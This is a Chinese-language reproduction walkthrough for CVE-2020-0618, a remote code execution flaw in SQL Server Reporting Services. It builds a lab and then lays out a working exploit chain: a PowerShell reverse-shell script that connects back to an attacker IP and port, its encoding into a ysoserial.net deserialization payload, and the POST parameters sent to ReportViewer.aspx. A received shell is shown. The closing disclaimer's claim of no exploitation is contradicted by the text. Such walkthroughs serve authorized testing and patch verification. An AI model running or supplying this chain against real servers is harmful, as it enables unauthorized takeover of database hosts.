(CVE-2020-0618)SQL Server 远程代码执行复现

0x00简介

2月12日,微软发布安全更新披露了Microsoft SQL Server Reporting Services 远程代码执行漏洞(CVE-2020-0618)。SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。
(CVE-2020-0618)SQL Server 远程代码执行复现_第1张图片

0x01漏洞简介

获得低权限的攻击者向受影响版本的SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码。
0x02影响版本
SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)
SQL Server 2012 for x64-based Systems Service Pack 4 (QFE)
SQL Server 2014 Service Pack 3 for 32-bit Systems (CU)
SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR)
SQL Server 2014 Service Pack 3 for x64-based Systems (CU)
SQL Server 2014 Service Pack 3 for x64-based Systems (GDR)
SQL Server 2016 for x64-based Systems Service Pack 1
SQL Server 2016 for x64-based Systems Service Pack 2 (CU)
SQL Server 2016 for x64-based Systems Service Pack 2 (GDR)

0x03环境搭建

  1. 下载安装windows server2016标准版standard
    (CVE-2020-0618)SQL Server 远程代码执行复现_第2张图片

下载地址:
ed2k://|file|cn_windows_server_2016_x64_dvd_9718765.iso|6176450560|CF1B73D220F1160DE850D9E1979DBD50|/ //使用迅雷打开

  1. 下载安装Sql Server 2016数据库
    选择全新安装sqlserver
    (CVE-2020-0618)SQL Server 远程代码执行复现_第3张图片

一直下一步到功能选择勾上"数据库引擎服务"和"Reporting Services"服务。
(CVE-2020-0618)SQL Server 远程代码执行复现_第4张图片

在”数据库引擎配置”选择混合模式创建账号 账号:sa 密码:123456便于后面连接报表服务器。
(CVE-2020-0618)SQL Server 远程代码执行复现_第5张图片

(CVE-2020-0618)SQL Server 远程代码执行复现_第6张图片

访问 http://localhost/ReportS,创建分页报表,提示需要安装报表服务器。
(CVE-2020-0618)SQL Server 远程代码执行复现_第7张图片

下载报表生成器,安装好报表服务器后,新建一个报表
(CVE-2020-0618)SQL Server 远程代码执行复现_第8张图片

(CVE-2020-0618)SQL Server 远程代码执行复现_第9张图片

(CVE-2020-0618)SQL Server 远程代码执行复现_第10张图片

此时就用到了我们前面设置的账号密码 sa/123456
(CVE-2020-0618)SQL Server 远程代码执行复现_第11张图片

(CVE-2020-0618)SQL Server 远程代码执行复现_第12张图片

然后把左侧字段拉到右侧即可
(CVE-2020-0618)SQL Server 远程代码执行复现_第13张图片

到了这里报表就创建好了
(CVE-2020-0618)SQL Server 远程代码执行复现_第14张图片

保存一下,然后点击运行
(CVE-2020-0618)SQL Server 远程代码执行复现_第15张图片

(CVE-2020-0618)SQL Server 远程代码执行复现_第16张图片

在浏览器访问漏洞路径:
http://localhost/ReportServer/Pages/ReportViewer.aspx
(CVE-2020-0618)SQL Server 远程代码执行复现_第17张图片

0x04漏洞复现

  1. 下载POC编译工具
    下载地址:
    https://github.com/incredibleindishell/ysoserial.net-complied

2.使用powershell打开ysoserial.exe工具生成有效负载,执行完最后一步的时候payload已经存在于剪切板。
1.

$command = '$client = New-Object System.Net.Sockets.TCPClient("nc反弹的ip",监听的端口);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
.\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip

(CVE-2020-0618)SQL Server 远程代码执行复现_第18张图片

3.下载Postman-win64-7.22.1:https://www.postman.com/

安装并启动postman,发送方式POST,地址
http://localhost/ReportServer/pages/ReportViewer.aspx

Body中填入键值对

NavigationCorrector$PageState= NeedsCorrection
NavigationCorrector$ViewState=payload(payload生成方式上面讲到)

__VIEWSTATE=
如下图
(CVE-2020-0618)SQL Server 远程代码执行复现_第19张图片

Authorization中TYPE选择NTLM,用户名密码出填入本机用户的用户名和密码,如下图
(CVE-2020-0618)SQL Server 远程代码执行复现_第20张图片

注意此处如果不配置Authorization,发送后会返回401 unauthorized
配置完成后,点击发送,返回结果如下图
(CVE-2020-0618)SQL Server 远程代码执行复现_第21张图片

回到nc查看已经成功收到反连shell,如下图
(CVE-2020-0618)SQL Server 远程代码执行复现_第22张图片

我们在执行几个命令
(CVE-2020-0618)SQL Server 远程代码执行复现_第23张图片

0x05修复方式

目前微软官方已针对受支持的版本发布了修复该漏洞的安全补丁,请受影响的用户尽快安装补丁进行防护。

临时修复方案
将Reporting Services监听ip改为本地。暂时禁用外部连接,保证此服务安全。
(CVE-2020-0618)SQL Server 远程代码执行复现_第24张图片

免责申明:
本项目仅进行信息搜集,漏洞探测工作,无漏洞利用、攻击性行为,发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。 请使用者遵守当地相关法律,勿用于非授权测试,勿用于非授权测试,勿用于非授权测试~~(重要的事情说三遍)~~,如作他用所承受的法律责任一概与东塔安全学院无关!!!

你可能感兴趣的:(漏洞复现,安全)